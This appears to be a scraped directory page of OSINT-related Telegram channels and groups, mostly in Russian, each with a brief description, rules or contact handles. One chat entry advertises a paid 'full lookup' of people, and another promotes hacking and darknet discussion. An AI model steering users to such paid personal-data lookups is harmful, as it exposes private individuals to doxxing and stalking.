![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FbR8RccA4eQXm1HZIAPfKZ4ZYCvBS3e8aQn35DHwIQNMkMIBcFe7lf7B0e2eD0WfnuUPulAEIVegK5GSB4jsv18lTle2buRn2CwrQCtFhWns_NpWMfZCE2D5yOqPzLHujJSLk81RSxgFEpoRBPtaWJehDPy_pfu9xnEFW2cq7FHeVTaVUo0cu4f-0MCP7vWU5tTTF8b8RIU3K9RKS20gZlX05PUNhaVv5p9hT25nwQeIv53k4eT- cJ3od4eu3XH3jGOT_xbIklRwBEWDUG9BUVCj0jvGGeVLYNavkEROX7JrVB76k2b_jVnz4GOj3mKSiR48L62StcQjJwqvcw01lCA.jpg&hash=955768d510a6379ae0ea445dca952227&return_error=1)
Поиск,Обсуждение,всё что связано с OSINT,NetStalking,Конкурентная разведка | библиотека,ссылки на различые материалы. 🌐🔍🔎🔏🔐🔒🔗📒📖📯🗝🔑🔭⚔️⛓⚙️📡🕶 Канал: t.me/freeosint https://t.me/joinchat/AAAAAEeBNmx0HfkRgR68oQ Group:@OSINT_Chats @OSINT_Library
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FOH8kFr6VywQCOmQsMrORZYDmr4c_PTogaZnDrVwlGNHKvtocx1RvJZCkxH_JvmUNjHftHltpsSIbC_9ZtW5MJ7j4v0kJFGy- P- ICeBxmwUljl6weADVWv1ohVWbxhoy59W46byu_JokO0BoG7bWfgiIFRbam4S90YEXEyu0XGNHYkEDJeSKrkdzSvTxyCOGE7RL3JGS_AdIBjCvwRUMpWtgHg8YKWUHHNf9dWHPMzz1854lAbxyALu9bI39RgxJPYJaGWzP5h6zYEkyOqye_ApU04EmfxUMNMJwObjw0I_zXVJhimtBGygUrjnuk1sWoY0XvmdutibPRMWNqDVCyBw.jpg&hash=a18f573d0142718dfff297264ee64f22&return_error=1)
You can view and join @osint_group right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FCajZdTOLxlF2fH72TWPZ_ptGFamhCVRi_xfXrQ1SEysz1Pu0w3bTDiAyAETIkmHC7r-tLjEGlYAXeRmslzV3nUEQqMnjfxmW- jGYrZlrWDhxAY4hEczMFDjyaGOSag4PdWK3BKIv8iCwyjqzVDeKMBkA2CWIAJvfeJWHcJhcr53s8y8NQf- ybPLYoCZW6VyfguFpcYRF5bdDGc66s-bz0gtI5m1ubMmDfLe3OAnGmrwp_TcYZvTCmnszIbncbrt3xf66IzgV-4tB2sOzmAEUC7ZWDCiX9jyb7l4rK2Xi8Fx1HxHSIPV- lWnRiosLdAaBfJf4zdX69CEhHwpyPC9BrA.jpg&hash=925a0a15bd9fcfd25017a8ad0b4896b3&return_error=1)
Внимательно прочтите правила подачи заявок и правила группы - https://t.me/osint_search/968 Наш чат по обсуждению методов и техник осинта - https://t.me/osint_rf Чат флудильня - https://t.me/osint_group
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FSI7IvGrgoUlxVY81OLDlsnOwDjyDwtY7DOSI-6iDcuafc4oych3zMRmS6m4lCFRYIySI1MbtdAKui5ZSXda4BDA6kwvRepLgZSkobdTru7nLQVdAYSWKHPjGGd_P_za22vDWkdkUzgrUjB5UqCA6md3FEEFR60v-Nw2-yyiIPq3sKqy-g5vQdd0nW8r-HUyIO8x0w2Iv6yrVNfCqdBe41rFYp30dzkuokFQqzE5eBvqVFgp3wcuITjCUABbtP7JopOT- zs9KoqT9QBpSE670UB2lZZCjyPQmH07Lw5EHOdJZtMmwhvA8EyS5NfKK- fEs0tLkaHOW3p5yg8aQAoM9oA.jpg&hash=7e91729a8afe6bef3978f78698735704&return_error=1)
Açık Kaynak İstihbaratı Araştırma / Geliştirme Grubu. Kardeş Gruplar, Kanallar : @hackingdocument @siberguvenliksohbet @sigintcommunity @signalintelligence
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FtIp2R1AHCZzmQBtIUQQnHf7yE1lYc1cJ3JL7w18MZQALPcvQMyv4b2w4kImtIr7-N28XepstMW8KqDfg7rH_ALc4kPDgSmYTYEH8l8We8Hs4iTEoIC_mFOXxlExbEyuno0kI_F- PqDMgjmJxgm221K6xr9xuac9pyDsyvQhKsfP-smyQ499gFNPXeQ- CHVDPiZSW7KcAXKbBiC4uWOYb1kHHADWfOgUte1An9X-R16XOdlnTCOrRzxsx3nJ1756dP1FIC6d3WSvd_ovoQKqf6YX7XD2Ik9KWVCs4lEt2e0XLXui1BRzus-o8cCLmPjJnCaLQpCAQh4WAP87HgMFQFw.jpg&hash=7b1c912aae4f4cc7885017b9669a0e01&return_error=1)
Флуд, флуд, флуд! Центральная группа - @osint_club Теологический кружок, музыкальная свалка - @osint_group Правила - https://telegra.ph/Pravila-osint- flood-08-02
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FYzFgdG537aax6VyXYyrH26MlOeMYRnxu_xr64yIA6-owLsRzrRYIfbX6NnpnybbHJ4CLWirWUF983ggdVbI9DrRDW_q3HQAPUYkZhrulRDdxVHiZ8BhFa102AijuS2N4VZr0HBF96826v2j6AKyXJjV1pwomKEZxzmi- Lq9xeO3Kdff-EYTr2zqDWlN8yTxCXGwXgtsa_QCUhfKWYOuEJx- zd5uGFPKTLLVfAL_oQA5jgVLDXQhtZhT_oalcWT5sAcPHfaRqD5PLA7dqOfLaQe2kHsZr_-g382j_e950__YpdJII66Q8EWOZxF82Z9pPHqpwx_rp_y1y_MnJWQNGtQ.jpg&hash=ba83cdd78c1c4ee0c8d1c5af156d453c&return_error=1)
Welcome to the club, buddy! правила: https://telegra.ph/Pravila-grupp-OSINT- Club-07-31 тоже правила: https://nometa.xyz флуд - @osint_flood
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FMOTDVKaKShR0_wLkiX0BtMmnIfUfZGFwn1QYutE6wPnMzy674gk5kwJVkKl4cV0Zw6m4IeGvcXwfDhMIH48oLAXp15RhBLDe9_1EMgB3klAkIowDgo4ly0C3ncxyQmC4wIj9n4K845Z_PgusfZCGA2TPYJG8ssBoe- u- WhL6lCGOdewCTVB8Xj9ptfegQEW9-UHGylWr0ywYNn8UlijRwehoHiKuGAmTRYkQgXUJOCs8e440dr4xKknSF03nwULNRWcTooZ- KLXrqWIDc4KIRSr_iIBlG05hpQJw2kfoEMoE5L3edwK0V9ntnMuurK09EPwkqE8y6yLS6sIGSGhBvA.jpg&hash=78934e9a0a7a598e2f4ef2e0e6079ca9&return_error=1)
Группа расследований: поиск людей, расследование инцидентов, розыск преступников.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FGuzb2xYpRWnTd_wmd1i0swJDMQrY7vmmkxHx39EIrKiitd87vHu- zvTRULyAm9RDDbKMrS5aIq8e1seonzRKTBH_XSsuaMRUmGSGXy1F4eFLTHaBw2SVxX- KaFUivnKJRPb0QdNyoKvGGHoidTAeASCsuP3G8fzYX3kUNDLmqw-7DdJrRyrAMVxKBIblznN79ve2WWkKjAUr1b2S60QbHJa4s5YXFbu6Yw98Xbwr- HFkQmGIBXTjy0XQrQGFNAQAj3sES8SabMntyEMo-cF9SrXp8ikf- epJLYo9RXjAvWeXHM12vHRs8ofd13jffYMml5MkEegpWEATXrJiOGk-3g.jpg&hash=430360045af125679ac7cded993a90e7&return_error=1)
You can view and join @forensictoolslive right away.
t.me
KKPLFJeqRwfk9EKWwPaOKeM9ZI1Z46tiu3XzhpKQTAlo8oISvqas84RExWFXe6TlDS4K2ZhgWYxUwcr89YQkMfLpvYutgFkyqy_1K9rhrU7joerxLgQtOVr5Ls3SAXgp_wH0PzKunchRvK6ZjDoVZHQb2Vn54V5n10d17ChX_4kLubnwLDhFmGtPxV83WJxsT1_JMWlsmZ4vQHEoLdBKBiDwXtk8L2Al0cAQQ.jpg&hash=91660f02eb409b4ad612dd604689d42e&return_error=1)
⛔ Запрещено ⛔ - Порно (Обычное, ЦП) - Хентай (Фото, видео) - Воздержитесь от рекламы (Скрытой и явной) - Большие конфликты в чате - Реф. ссылки 🙅♂️ Нежелательно 🙅♂️ - Нежелательный контент - Оскорбление администрации
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FAKpSz9sCVaJVUq9P8S3MdSGMY9crnmfi3ZkW_E- YgLNIvW6sh9Ziev6geLpEiGdua2yAITpsSgA6Z6AGdD3OOharUIyAssN_4b-m6i1G8ChxRTJJcmJ2PjxjY_MmBHZQcWe37ORAtvYKpQ7QZdnChWyCLP- Un2wikfyMAevIKGv9r0kMl74JlCJckc9sNxsLgRmwzDi3w24WTaHzifbw4WRURFaJvPA5K3TDZZdhegWt-V7g3y3EW4Rm9WkUkjfbjqrMB_lAROfQ7NHt1nXpnUncuR13hkyRk_E5ps8zjwC8PqGBeuHeAHQ4aY04DasfYbFwmoEWABUkOA5KDvCjrg.jpg&hash=c7794ee1e287eb2f395c0f770e7518e2&return_error=1)
Чат канала "OSINT Беларусь" (@OSINTBY) Общаемся, обсуждаем, делимся знаниями. Обратная связь: osintby@protonmail.com
t.me
zq6VsFe5uKp8CD1XnlO7lBrPXLfFOnHHSxPLf9bvnmepyu9AsunZGBul4mW6SaUC9V7Ihq0xbsY92yx_RSR96i2SODt6H2CcRdoN7XsuGzGWHioJkMW9NUM9qpT9FQoVvZsnN5fLzMeuiI2VQQLhAE- DMfz26qZMhlXufyeyZfjgij_v-9WAqsLpPeLTPnZA1qSvTerY_a6X7vMSOiOqQaoNGA.jpg&hash=d60d06e27b458544df5abcf5d29fa7db&return_error=1)
Полное обсуждение OSINT. Просто общение на любые темы. Надеемся Вам у нас понравится. ❌https://t.me/usersbox_chat_oslnt ❌https://t.me/usersbox_chat_osint ❌ВНИМАТЕЛЬНО изучите правила группы. ❌Полный пробив (платно) @GrafDeanon2 / @SoldatSempai /
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FhJIYwvhlvkjyT23P3eaKF6RjTyaj3OdOyQHz_5jiQ7ikhzx_P0czybha8sDc536KeY8TgwEvfg5Ev9f6PQsByk- Nbh1hLNjJ2xrL0Og9Vjfg6huongtiV42BYeVRUMrqLNbs1sKHafZJI8Z6p7iTAAdvzg_xMMReAc1SfeLg9W_dFpiYz18snE1-cT6TmRZSqscxv3FMIAW0I0SAvYGNuhIW6Ow15GnbPXQPaR6v1W-ZPvXyxRjVHYf9Oam6lmyr1_H5LXQvP3VPMquyz92TeeiDAiVaxm77SfCq70I5c8OvQZ3Ckazpeoyd7-TSLj08NB9urzJOYY8OX13Sas4_jw.jpg&hash=0d2b5914a7894990911704f6f5236a2d&return_error=1)
You can view and join @osintesp right away.
t.me
Каналы:
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2Fvl5VT4cToxHh0jxbuT-5ELwOGGLwcXM- ZX1sEhhE5m6gxp3R5-ZjN8E7IwAOuXOI0yw6ErOWCZLB9vJYPxv4Mo8AlACI50H8WXNiz4wNNLz801vEwVgrMn2aXj-s6DrsYg0Htnm6KssL7CjsUAJWo75h73QixfLpjMmqnyt469lswVz8mv6rcZdpCULE0DGqs3BpB4RfZjl6bf3r5tJQFNa8uP3pT- SeBg5HFbm2eMps1c847MvdUlluLYw_rfG7hHjECzsDMV1rCM_2yo7UiN9_UG5nbkHb4Pd2ABFNkGg_9D3vVyKP40GEq8sACTHWyzi2gyQLTzSAKRQq1RISLA.jpg&hash=4466fdd473995740fcb760232244c106&return_error=1)
About OSINT & HowToFind bot in Telegram Channel: 🇷🇺 @HowToFind_RU Group: @HowToFind_chat Bots with resources: 🇬🇧 @HowToFindBot 🇷🇺 @HowToFindRU_Bot
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FLNenu662bVXDPlR3-QQjSkdIb99oRgw- uAfmfuY4cjQ8V_73VpGYN_PGCWoa8pQ_QmRB5wxt12J2lF3Z0wsBzy9FOU- vowdTMjWmaEarwpvcmh80QpHc6nxF5TEGeZCyzQJUjY7w9AluallSI8H-GMFnbmYPozajqJfMZ0rV8zrmdDHVyUXwN9NjH4LnipQl- wDLGuyhUiVW4-Wb0xGz0FZazflsyhGE2uS1NX42Nj- a-F81CaFnqG7tCEf_dZmWrTSamS9qe3oP2-X1y2YKboiXEMvBGOjBfAX9sy1zDgz20DlXKzvkY-8B0KDzFbxZ9op9uYg9QBYSq7GhbvgZBA.jpg&hash=fe9600c9abefc3116a51ac9ab4179a1f&return_error=1)
OSINT (Open Source Intelligence) - комплекс технологий поиска, аккумулирования и анализа данных, собранных из различных источников информации. Обратная связь: osintby@protonmail.com Поддержать канал: BTC: bc1q6fcsmkukuxr2y0hhtvlk656wg7edy0p6gztsqx
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FS8TrcQMq7BTFvVG5zrYUEsEhliI8LhYeNJsIEaBQ_CunDEmTonsWVc91PyEBawzdwWQSMxsLUUCxgszqfiuSk8kc9QsQWyCC4Rk7Pt_9bASoy_qU6d1Jsfs- RsmKwCnSFFnSwbiacBHJDUa_xzmHv5XiBVUxkP- FsuS6p3Csr5iD1uSF8fRmC80ZNO_Wqkn5f1Qr2pHFMdoGazFF8yfabRIMKa0xwbYx4fAN64L9lxQNy1zTd476hKN3RUGpem7ImclDP_zOVX75dh7d5CQsPSS1JCqFr1sFlFJRPEj_kPrwF83zOw0-zliciBhxS_SwohXtOWurP16Q12bH2yIVDw.jpg&hash=472286f7d3211085d2e5d541aa8e40ff&return_error=1)
Взлом, OSINT, информационная безопасность и всё что с этим связанно. Дополнительно: DarkNet и обсуждение "тёмных" профессий По всем вопросам писать
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FMgUBwcNrc5a7kqDCEHovJpnY4BZNeWuzctZmbTsLFgpYlmvxlL893VGEFf84NKLfBvgrGX6yaxINnKnhBDhDSIFjlhskTHWq5EY4nrszp7m2L7HVeR1crUAAlxQSqhpLI3H2-pYbHZTrxJy3s4sYnthkGfUz627V0-_siauwRKU_8Dbj0UcwlPstMdmNFf5ex4sx0du0ga29nsPl2VUG0tdKh8Lhpy1neiHw1seXD8463kcW0PK8NOjF7oOc9nHxvkn3pu1TtHTvrMFuCdottZNq- KYqsdjYbhiyrJ7kfT5OuncFO6sS4MbKvgS7LpE7Mk8rVtjOlgiwIb7dQnsNeg.jpg&hash=72f96ad7c9f688d5ca7f8372d59668f8&return_error=1)
Concordia et laetitia! Пишем и переводим материалы об OSINT и смежных дисциплинах. Наш бот, который покажет, в каких чатах состоит пользователь TG: @telesint_bot
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Fdq7PDHqEy5W1WhnWQaP5E-0a_vhduvhqsQLQBwgXf28PM46maps1eW2z0RMT8E0_FKCoWMtgEf_VATKL1gBLoZ7HR0E0xFTpz_hnqe3I3OaYybdKBPprLJJVMBjKelgaBr5JJ6UibyX3QEG0kmVMtBPL1T-WJEqFu3R7MwDXfISEoB5bbNpqhVqGbJw1VtRGM- OzjRXK_D6rOVx8dKC3m0U84cqLJjie-- h0dn-82orMVTA-6uhpGsZ4EYOVl1bQ2A5R5DYURj37jlHSxUBxP88q_Dnw0C1wjbdXrAXEJE6gN5-MU3fkagRI6A_KZN4J1ctEcgr9Qjy4khiYBapr8w.jpg&hash=22110114c372838ec1c28bb61f8af729&return_error=1)
Делаем из поиска искусство. Разведка на основе открытых источников как образ мышления. Заметки, инструменты и просто интересности об OSINT. Сайт: https://osint-mindset.com Поддержать: https://boosty.to/soxoj Написать нам: @osint_mindset_contact_bot
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.telegram- cdn.org%2Ffile%2FHXwW_zzLiBCDbvZiH8abwIL95LzOdhkBljCD3m5_LQBTVXtsxGbl_yRxcMRDZmGrxnN0T_papI5DP2QDwHzfrOwedNnXazNh25QaYThjkrj_GylzWJL9kwAcBtMr7_Ytn1wW3SExuOfaWqWs66iuRdRtsz0SObiuy2IVyUg-2V3gnvT-3TGsh7bmd1C_85viGRHL0BFvuZlYNmfIkUpwK7tuZAG_CQvdFrRgXzOiwjjLZtsS5cxDA5tcjhhp1Wtqmr0yRi7QExT- HpJzpcAb3qxEUVXZnC2pxpXj7IM9smyW5myOIu4raz3AB5A59JgohzCd4vahCrty- vBS9GReBg.jpg&hash=896a22d98046142fd866d39ae5d4ec5d&return_error=1)
Canal voltado a Osint Grupo: @OSINT_BR
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FLk32NQCSgDzJ3qayPhSpSC0ISBgmfPkQpIxMrcD7TZPZxqWmY7dYQnas1uKEORfyg6rJFOvXB2ntDN_JbjT_4ZAqnQPKFptGNJuEA4-oFXtazECsXEcoA_ke8h344x0kA1mcQhYjBl0ug5P1Or- XLPADup50fBdWArfvyj8VnqdhB9xS9bTpkD4D4CPz1LmQWtijDa4F6nkSS3tRw7AZOPpUOY0R4JCsod_885q8uLAcqZ7i-bup8sC0x3zz6kWYheEnr9wUo81SXPJR9cxd2PsSwJT_NHVC_bCj- _aYSocGNydZjTWLtsEBELKoBFRMFCK1R6WzaXRxyjLm3ZKKwQ.jpg&hash=41038db34c9c3ee0e5bbd0e174adb27c&return_error=1)
News about Intelligence & OSInt. join us in the OsintOps.com Groups OsintOps - IT: https://t.me/OsintOps_IT OsintOps - EN: https://t.me/OSIntOps_EN Please visit our blog for more news and further insights! https://osintops.com/
t.me
SArBCdNU39n1iU0iR6R0VTKXrdnbZuVdrDB5xuyXT2vqs5LTA7Us0T25ShWPFqjsz5oovwSmmWN6iVbDluHrtLtmpghrlkHnBPcQ1ccYJMsmlCdZ6qgl55VxHGU1nW_- EQUicCLsqq9C-7xIkxS6PMVuOUcXrbaGxJ95JZdwKzFsfPDPe2aQA_E3sRfwa1L8qCcErHD4K5B_KGkYHATO7-TKlyUbsldqrOzuGCOdp0SAE7i9tcksY41xzOueOTJQtm9wmonAMSuGh- MD7v9FCiQ.jpg&hash=c4f0117c519220113ee538eec03296e5&return_error=1)
🎤Интервью https://www.youtube.com/c/RussianOSINT 🚀Лаборатория OSINT [v1.77] https://boosty.to/russian_osint 📲 Связь @russian_osint_bot 🧑💻 Реклама @russian_osint_pr 🔥 Cтатьи @russian_osint_content 🚸Пожертвования @russian_osint_donate
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FHSlkekpRRmK2DnySnHctKih3dpgJdflPfHMqCC0nIicZpgQePKSwwI9QCU4QX6vZRGZ8REZ5yOMQ63N0f1Iahgj6VYZQngDUgn4EendZwfuL4SxYdBZRLj6jdMZ- MzVMWHfGLpmgCUj2gTkMMSLW4viV4Q3uDaSLhFAC8U7j5V7-i9-9gkLJfc6y28yXdq7ogsLpBvXmZfxuD9ApGHB3j9UAmWvJLAXMLPvJViT53P3MQXAWgsQqy34jQLLzEq8PLKCbhaOEXIkPmjUvYWn2H7mHTUywSB14WFZTVkHsEv5kCbWoIjJKcLDESTsh60wDcK_CNso3cBxjhAZOk2ZCRw.jpg&hash=ad816e90f7e2420664844f38e9b5be6d&return_error=1)
Digital-Разведка - нетипичный дарк-канал Админ - @CIownD3rty
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FFdYiPBxzObXPAAlbdj-SGVEtuxApm1na3qo7vOukJUzy- lSpypzQUc95vmd_j1vRrqHgtElo06COAWwzy2A8bt37fgVR4qEHLtEAct_NOymCTIyGJ24TccJZJzIdsPeBBWWRI38iJNoh2Ocli9eF1xPJMb6zE3DjvzHa9bfDEY7HB5dzKsx1DOCxtgqVYUOOVchuQN2S_vaCNlNduLGKAx9SJ2_n78ijAHwlrbzj5iQs- ykSo0HfeQuzMXOvCumJHYurV1f_Xn4ogsMhDwaBNOsIzJqwQAok3O99mNLBxyOkl8XietI97ijbn57U7k7LGj_IyPouzhWqhrJ8A2BHzA.jpg&hash=ca27afe18a9545c2e600940f6b951f73&return_error=1)
Шерлоки Холмсы цифровой эпохи 📧office@irozysk.ru 📱+7(812)983-04-83 интернет- розыск.рф https://vk.com/internet.rozysk https://www.facebook.com/internet.rozysk/ Хештеги: #КакOSINTить #КИНОпроOSINT #НастольнаяКНИГА
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FJHYoIMg0xRy5yqB0Hr5VcL31p-Ok2a-aOVmP19lsT_iTuDwq9v43YnjcR_PuwEDy7E54VPPKI7RYjpHGwmtpnqc3US56tCU1MdS9gqWoWVrNlgB81yyT33TlUL4NlsfKGqVF9AjsuKWFWLLICxTWWPIzDo2L1tqKkqOtkD1MF54q2ywVbjMMZXCvBwdTmTpm0Ivg55LI9pajMVkuugICbRcnCIE4gSgRy9VWI0_Z0RVhzfGZ7z78REVFWuHTgA6Wc8v-Ksd2lUDjudKswAZml5UWi3hGrM8du1n2Xrsixdvo7cwmz93H0Uk7r4lC7x1UcrPIrYVwKz4H-cj4zSfodQ.jpg&hash=03cbc381299cbbaa782d414df692014b&return_error=1)
🌐Open Source INTelligence или «Разведка открытых источников информации»🌐 «Find what is hidden deep» 👁🗨 OSINT Chat: t.me/OSINTClub OSINT Group: t.me/OSINT_Chats OSINT Cloud:@OSINT_Library
t.me
Библиотека материалов. @OSINT_Library Chat: https://t.me/joinchat/T2GenddWlsauVQr0 🔎Information: FreeOSINT https://t.me/+R4E2bHQd-RGBHryh
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FSYuf28XrKlglMriiCe77DJ2G_elDvkgW8_K2ZOnXmzJreldJYSTLOuxLXTODW3TmIOjO9Hce-3lwuvbD5ggka1bbQW0YhMlJccxLWm_kmvt5poV6dbAr460YHqUFNJexQt8kuxoqkm3o19IIxKbMVL5ZhqzFAM7Dq5iQCdIShzJpQHfdB07i-X5nZhRPMhwwpr3snuAUvO8ksYdYW_qvqKYTajbHlvKuXIk0lBap61HJ_Fpz2dD-X1YXHpGWNswNw- qLkOr457927N-aQVjt_j4zp4luvkLuHHOm_GTLF1u31_zgq7GnSMdz09pnsfsv5K7BvU7nV6icPZvRTDd07Q.jpg&hash=9df29f83b7705b52c5070d1f219b64cf&return_error=1)
Некогда анонимный канал журналиста-расследователя Андрея Захарова (в прошлом «Фонтанка», журнал РБК, «Проект», сейчас — Русская служба Би-би-си). Иноагент №77. Сказать «привет»: az7@protonmail.com
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FtplWx5JKx8FRj3QJ0bcX-9mzBAWmccQwQjXqtVH0ffs0N-VEM- HmVnRvX0eb9G2JcKz2ix0e13u8Fv70rxoAhzsdFhlJGc5mCTmNtQIaTLDxbK4G1qx3t7LAIAussTOY5_XwnRaHRzHfZtkf7zXGl6h5OH885dnaMuLAtTQ5LMh2ncDMjRi9106RUymvB6goI8po5GpPL4fVp2LFc- AXjF2Bl7SgIB70jWC1AVcct6u0kpRx6B-zHu5F0DM32xURRtgb0mBYdlVi1g8BZ5LmwPWlRIhzR0F5WNNMAEdX1l0hsNVdoeTF1_TJShG6pF3i6Y0_w8ZV61u3Gv5iEq9sKg.jpg&hash=5e34799eb71f55064bfa56685eadd2ea&return_error=1)
Зараз відбудеться елегантний редірект на @molfar_global
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2Fr-Q0NE2Loag9wSwiNJmSrozD3KjDfU2N2-TiUCXJOzyBM2OQ3yXlktWjhjSqCAcmoRKZ- Lo6Q5qqTjEPzZcfA7SvEZytTyHQ71VObexnuOWdUqaeouvuJ3b6silzs6rs1FAh9Yr9jwK2AuRorhJ3smqWCPHqh8HyqT1oWloUQScKoZWV3AwC5GbmzCTuZ1DqPcsaG4QYu_4uNRK4Ebo6P0GpnAfk3Elh25bVCkf1zGTGQQuDZVMHIOrnVIcojJxIJWlLNCP4O0S3bN0QuhMH17VXuQ7zvyqASqOIVjHrBnIuJ4wznIgR69wKGXwvZnnS20M7xzPmGKyCjgrppgQp7w.jpg&hash=e0dd8cf1d738ce632c3bf72f5df7dd53&return_error=1)
Информационная безопасность, социальная инженерия и лайфхаки По рекламе @bagdanus Владелец @Aleksei Данный канал входит в сетку каналов "GURU" Сайт: https://cyberguru.tech/
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FKqHHqTid5XxfdHuG7i4KLvOu1lb_bSegz_lOVby1YWPUo6JxpSJytMv9ytZo2D8RmXa6Ozzlf4rVVeRqAORpBPLoaYzPdfOfeUb0c9ZBHaPO_VcAe05VPcX- LOOlr9RTeURm1nMmq6s_oGO4myBDv8PjgJ1F2daxnokaU8XgCXj1KD3ddodWLuSP2srHl9JhcfNPfDRKMLAaz- bKNKH_Fk42h6WwN38i3ou85Pl4qqTWMNKhGmZhvhzdawsMkZPSIN32wvjucFDlfM32d1dIYWGCxkS_cq4yeezpnmbnIMHT8m-yrBu7r5n199_KfQ- KFToNwpA5haYdRY3mPF4eCw.jpg&hash=3875c711f9b587e30321d34e436b968c&return_error=1)
](https://t.me/rosint_info)
Конкурентная разведка, OSINT, проверка контрагентов, исследования рынков и прочая информационно-аналитическая движуха —— https://rosint.info
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2Fki0tGY-89DwRamVY56fdKTp- RBOqLYkQUJhrAbWB7kZEyxb1GLZkwMB89HbSX9OEXjDEtVaJTBA6HTwx- WNR9pidn51u5Nuy5S6-lhOPQquRavFhF94XFlxEVBgRRH9HSaChMdBmeN4THS_xOlg_P9ofVuoSvoy7cN2COAOI5NUEIPsXpoBzLgmcGoDFGLc2BFCShPHaoZR8gKtFz3W18IX5N1KWHQShtw- vhVlZik5H_d5zvpeBmIxmsGL9AgR54ujtHqzzUCnXvud9KZLjEFe5zxEK13YJJ5p1PW9OuWxOGsKv- zMzjMJRF9AErw05V0TVxlmlTsNjXuYNlsWG1g.jpg&hash=e9cabe2fbaeb392dacc49d1714473c2e&return_error=1)
Канал посвящен новостям в сфере конкурентной разведки, утечкам данных и социальной инженерии. #CompetitiveIntelligence #OSINT #DataLeak #КонкурентнаяРазведка #УтечкиИнформации #СоциальнаяИнженерия #КР #Новости #News
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FhKQRcm58XBZ8mOzHNleMbiDwiQkNtEH9RX_VjL5yE9oMVE8ZNwvRd0n5uiDX15d-SFHZIF- GBpxKzLHno9IiWQc1htlAI3DcsMRouY3E5eDOOG6hvi48TqH02WEo8rUpKJr6meRY7gzs8TUc9iVshQzrOlVbx_7ghoqGn2p8HzfxY7P3c3S5wtJEzCrMAe0e7_zBddy- CREvbXGy2oCyVlSTZnqdoLFM- DyjYV1HA9dno6X19kYF0nU8csywsmf_V6cNT059Dt0rbLw4PFIJxC_n4AghuNJzsT0erN6LiVL5mX6ZPCG3zwH4wGJC7KQ5mVR40KB6ou5DL6F8LLVfUw.jpg&hash=80498de02b324a4a2701b6877d11a27d&return_error=1)
Инструментарий для проведения расследований, криминалистических исследований, корпоративной разведки, и исследований в области безопасности. Чат канала: t.me/forensictoolslive
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2Fu8SSzPiaXp3yUdYwJ- JeXqzLqLiixPOTj7eCC5inCQlsSN1Qr9IOwNt9Nend0MrSNDggAz89JG_Q4A1S9vmshHychBMrq_sWFU1xKRyrRxj8R539EYrfHV2ULyWmN6NArHB6YS3IdtjGU_r_ymXDL2D5OqXx1i_KLAzmubzpeqNZr6MumYpsQFtSd98AOxyI5ocM2UmtpFUKr- cWD2mktXeUFO8MNRa9GkNX3aqkF5H8WMm3sZMrzQUWac9G-ph8AuEYcqXyn4ywalTTWVDOTrsXzZnHswBqk6GAcVIEmLBhlwrp_QA6lkv6M23TfXnq79JTsSCghMv1KrFj1m902g.jpg&hash=9f2b14e438cb4c22b106a3fc9465500c&return_error=1)
Русскоязычное сообщество по обсуждению OSINT и форензики.
t.me
You can view and join @smoke_osint right away.
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2Fpv2aTWfTCj823IaiZX4NvoRWg4JsdyDn0lWFmh0yeuD9BUj1pbGukYY5tibo9tv0E8fH3PIx6hPdCLWDfepyg49pdWCZHEZouFL7nBfJvG-n4gHcPxo78jH7j8FvEFyA9ddTFv4Gaiosq5MwasUQ_HjXBrVYpZoBiUAEGAsIszcddTun9llVfuuQ8sHbxTfktAUoD96Pj7jSF12oHRBkrm0Hq1PrhIe13pWSY6OGfckk_oWPcGHskjcKhy55ts9qeOlklclyxr3aQpTKFPOcs0NzbM4uYZ72a5IfRMPeZJv- tRAPoH4vgfLOA9TcedWl32dtEheTxYEU8bQlne5POA.jpg&hash=7610eebe861b9a20cad9a6907d8e5583&return_error=1)
Единственная в своем роде библиотека по теме OSINT сбору информации из открытых источников, технологии конкурентной разведки, разведка в компьютерных сетях, инструменты сбора информации, расследований киберинцидентов, анализ пользовательских данных.
t.me
Форумы:
OSINT Tools, tutorials and community
